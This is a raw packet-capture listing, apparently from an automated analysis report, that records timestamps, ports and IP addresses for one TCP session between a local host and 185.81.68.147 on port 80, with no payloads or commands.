Dec 13, 2024 01:37:12.444411039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.444530010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.444597960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.445342064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.445540905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.445610046 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.446259975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.446464062 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.446532011 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.447165012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.447283983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.447352886 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.448072910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.448204041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.448271990 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.448976994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.449126005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.449196100 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.449878931 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.449999094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.450067997 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.450809956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.450912952 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.450980902 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.451703072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.451895952 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.451966047 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.452613115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.452729940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.452800989 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.453562021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.453671932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.453752995 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.454423904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.454541922 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.454610109 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.455341101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.455466032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.455533028 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.456247091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.456388950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.456458092 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.457154989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.457290888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.457361937 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.458079100 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.458208084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.458278894 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.458986044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.459110022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.459182024 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.459860086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.504712105 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.604168892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.604192972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.604362011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.604396105 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.604547977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.604604959 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.604654074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.605472088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.605521917 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.605601072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.606398106 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.606446028 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.606493950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.607319117 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.607368946 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.607398987 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.608200073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.608249903 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.608295918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.609116077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.609164953 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.609234095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.610052109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.610100985 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.610130072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.610918045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.610969067 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.611025095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.611846924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.611897945 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.611926079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.612731934 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.612782001 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.612828970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.613663912 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.613713026 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.613759041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.614552975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.614638090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.614667892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.615458012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.615508080 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.615551949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.616399050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.616449118 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.616493940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.617271900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.617322922 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.617398977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.618232012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.618283033 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.618290901 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.619112968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.619163036 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.619209051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.620021105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.620070934 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.620141029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.620939970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.620990992 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.621020079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.621828079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.621879101 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.621943951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.622749090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.622812986 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.622844934 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.623658895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.623713970 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.623754025 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.624567986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.624641895 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.624682903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.625475883 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.625529051 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.625575066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.626418114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.626471043 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.626499891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.627320051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.627372026 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.627434969 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.628264904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.628315926 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.628665924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.629137993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.629187107 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.629232883 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.630029917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.630085945 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.630116940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.630937099 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.631047010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.631114006 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.631854057 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.631906033 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.631974936 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.632774115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.632891893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.632961988 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.633657932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.633708954 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.633760929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.634582043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.634684086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.634753942 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.635490894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.635549068 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.635643959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.636409044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.636487961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.636554956 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.637306929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.637409925 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.637474060 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.638216972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.638281107 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.638322115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.639115095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.639235973 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.639322042 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.640043020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.640103102 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.640142918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.640965939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.641082048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.641169071 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.641854048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.641917944 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.641957998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.642755032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.642863989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.642945051 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.643659115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.643728971 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.643774033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.644573927 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.644691944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.644768953 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.645474911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.645591021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.645677090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.646488905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.646578074 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.646594048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.647299051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.647454023 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.647521019 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.648227930 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.648274899 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.648300886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.649139881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.649250984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.649313927 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.650029898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.650079012 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.650125027 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.650965929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.651046038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.651108980 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.796081066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.796144962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.796220064 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.796518087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.796601057 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.796698093 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.797400951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.797548056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.798012972 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.798299074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.798427105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.798496962 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.799206018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.799338102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.800137997 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.800204039 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.800250053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.800318003 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.801139116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.801261902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.801333904 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.801956892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.802093983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.802170992 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.802844048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.802947998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.803015947 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.803760052 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.803881884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.803946972 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.804665089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.804691076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.805469036 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.805557966 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.805640936 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.805963039 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.806466103 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.806602955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.806658983 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.807406902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.807492018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.807570934 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.808317900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.808460951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.808526039 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.809225082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.809331894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.809412003 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.810110092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.810224056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.811093092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.811158895 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.811197042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.811263084 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.811971903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.812094927 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.812196970 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.812855959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.812962055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.813028097 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.813767910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.813873053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.814383030 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.814663887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.814793110 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.814850092 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.815645933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.815766096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.815820932 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.816500902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.816606998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.816669941 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.817399025 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.817552090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.817629099 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.818317890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.818454981 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.819221020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.819282055 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.819334984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.819397926 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.820132017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.820249081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.820739031 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.821047068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.821180105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.821244955 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.821939945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.822036028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.822094917 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.822880983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.822987080 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.823071957 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.823776007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.823903084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.824270010 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.824712038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.824816942 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.824872971 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.825593948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.825720072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.825773001 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.826497078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.826628923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.826721907 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.827423096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.827521086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.827578068 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.828337908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.828459978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.828516960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.829232931 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.829358101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.829408884 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.830126047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.830250978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.830307961 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.831054926 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.831182957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.831242085 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.831964016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.832086086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.832145929 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.832866907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.832977057 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.833029032 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.833762884 CET	80	49707	185.81.68.147	192.168.2.5
